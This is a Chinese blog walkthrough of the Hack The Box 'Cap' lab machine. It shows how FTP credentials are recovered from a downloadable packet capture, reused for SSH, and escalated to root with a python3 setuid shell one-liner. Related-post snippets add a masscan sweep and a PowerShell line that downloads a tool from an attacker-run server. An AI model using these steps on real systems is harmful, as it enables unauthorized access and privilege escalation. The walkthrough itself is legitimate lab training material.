Hack the Box Cap 靶机渗透

最新推荐文章于 2024-08-24 19:09:04 发布
最新推荐文章于 2024-08-24 19:09:04 发布
阅读量379 收藏 1
点赞数
分类专栏: Hack The Box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34935231/article/details/119044605
版权

Cap 靶机渗透

目标:得到root权限,取得user.txt,root.txt
作者:shadow
时间:2021-07-23

请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

浏览器访问发现security snapshot 里面得值全为0,并且网址中data后数字还会递增,可能故意将真实数据隐藏,直接改成0尝试

点击download,将下载下来得日志在wireshark中打开查看

 找到ftp用户名及密码,登录ftp查看

成功登录ftp ,并且得到user.txt,下载查看

二、提权

尝试登录ssh,帐号密码同ftp,成功登录

 尝试sudo,suid提权都失败了

https://gtfobins.github.io/

尝试python

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
成功提权

 

 三、总结

详细链接请见https://www.cnblogs.com/iamfy/archive/2012/09/20/2694977.html

c2hhZG93
关注
专栏目录
hackthebox -- cap --walkthrough
zyq569的博客
08-21 137
Hacktheboxcap 实战 recon port scan sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.245 --rate=500 | tee masscan.txt 130 ⨯ tee: masscan.txt: Permission denied Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-10 07:12:19 GMT Initiating SYN St
[Hack The Box] 靶机1 Meow+Paper
Huamang的博客
03-24 1804
前言 久闻HTB平台大名,这里不需要下载镜像自己打了,可以直接在网上开好镜像,连上vpn直接干 这次就算是对这个平台的一个熟悉操作吧 Meow 下载到了open文件,kali连接上 然后测试一下可以ping通了 然后就开nmap跑 nmap -sV 10.129.160.90 开启了23端口,telnet服务,直接连接,root账户 直接拿flag 这个算是白给的 Paper 下面就开始打正式的靶机了 一开始开启靶机ping不通,发现Starting Point和Machines居然不是用的一个
HackTheBox-Cap
qq_39966991的博客
07-19 845
从这篇文章开始记录自己OSCP旅程,先从做靶机开始。主要是在hackthebox中做靶机,用kali连接vpn就能直接开始,不用再下载镜像文件。 hackthebox官网:https://app.hackthebox.eu/home 开始连接VPN 连接VPN后添加主机本次攻击的目标IP为10.10.10.245名为Cap的机子,操作系统是Linux 打开网站10.10.10.245后有发现Security ...每次刷新后URL都会在后面加1,并且最下角有一个下载按钮。 下载数据包再用.
HackThe Box--Cap
最新发布
七天
08-24 724
Cap 测试过程。
hack the box cap
qq_26947429的博客
08-27 241
今天来继续打靶场hack the boxCap靶场 首先用nmap扫描靶机开放了那些端口和服务 靶机开放了21,22,80端口,现在就不尝试爆破了直接访问web页面收集信息,再用whatweb来识别CMS的版本和型号 看着像一个网管平台,在访问安全快照页面时发现了http://10.10.10.245/data/32,data后面的次数会增加,而这个页面是来备份数据流量的,也可以下载下来,我们访问最开始的页面可能就会拿到管理员登陆时的流量 保存数据pacp,用wireshark
hackthebox --cap
weixin_47156475的博客
08-09 270
文章目录前言一、信息收集二、获取shell三、提权总结 前言 前言?前个屁的言。 一、信息收集 nmap之后看到开放了三个端口,分别是21,22,80端口,于是再详细扫描一波 根据服务的版本去网上查找,看看是否有exploit,结果没有任何收获 (可能是我太菜了),于是使用nikto扫描一下 没有什么有价值的东西,还是老老实实去80端口看看吧 二、获取shell 看到有个search,试了一下,看看能不能远程代码执行,发现行不通 参考了大佬的文章后,发现在每次访问security snapsho
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
[Hack The Box]靶机8 Optimum
Huamang的博客
04-01 470
nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看 打开是HFS,nmap扫出来是HFS2.3 这个版本的HFS是有cve的 https://nvd.nist.gov/vuln/detail/CVE-2014-6287 msf有这个模块 直接拿下shell 拿到user.txt 进不了admin,需要提权 本地起一个python服务,把winpeas传上去 powershell -c "(new-object System.Net.WebClient).Dow.
[Hack The Box]靶机3 Lame
Huamang的博客
03-28 265
配置好hosts,这里有laboratory.htb和git.laboratory.htb namp一把嗦,扫出22、80、443端口
Hack The Box——Luanne
热门推荐
江左盟的博客
12-06 1万+
目录 简介 信息收集 漏洞发现 Lua代码注入 漏洞利用 权限提升 用户r.michaels的Shell 总结 简介 靶机偏CTF类型,评分才2.3,评分这么低是有原因的。总体思路是通过lua代码注入获得WebShell,然后利用CVE-2010-2320读取普通用户ssh私钥文件,从而获得普通用户权限,最后通过解密enc文件,利用.htpasswd文件中的密码获得root权限。 信息收集 使用Nmap对目标主机进行端口扫描及服务识别,发现目标主机开启22、80和9001端口,且80
HackTheBox-Cap WP
h1nt的博客
09-07 153
0x01 信息收集 端口信息: 0x02 打靶 访问首页的Dashboard,可以看到存在疑似可遍历的id字段: 将id改成0,可以拿到一个数据包。拿到可以看到ftp的用户名和密码: 使用该账户密码尝试登录ssh,成功: 0x03 提权 上传提权辅助脚本linpeas: 运行脚本,观察输出信息后可以发现python3被设置了cap标记,可以用它来帮助我们提权: 在网站 https://gtfobins.github.io/gtfobins/python/ 上找到利用的
Hack The Box——ServMon
江左盟的博客
06-19 775
简介 信息收集 使用 漏洞发现 漏洞利用 权限提升 总结
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6844
Hack The Box,一款有意思的渗透测试平台
Hackthebox------Jerry
大方子
11-24 3071
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
HackTheBox-Jeeves
网安星空
01-10 485
HackTheBox 网站CTF靶场PWN相关题目Jeeves,主要知识点为缓冲区溢出
Hack The Box——ScriptKiddie
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
入坑 Hack The Box
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
hack the box three
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值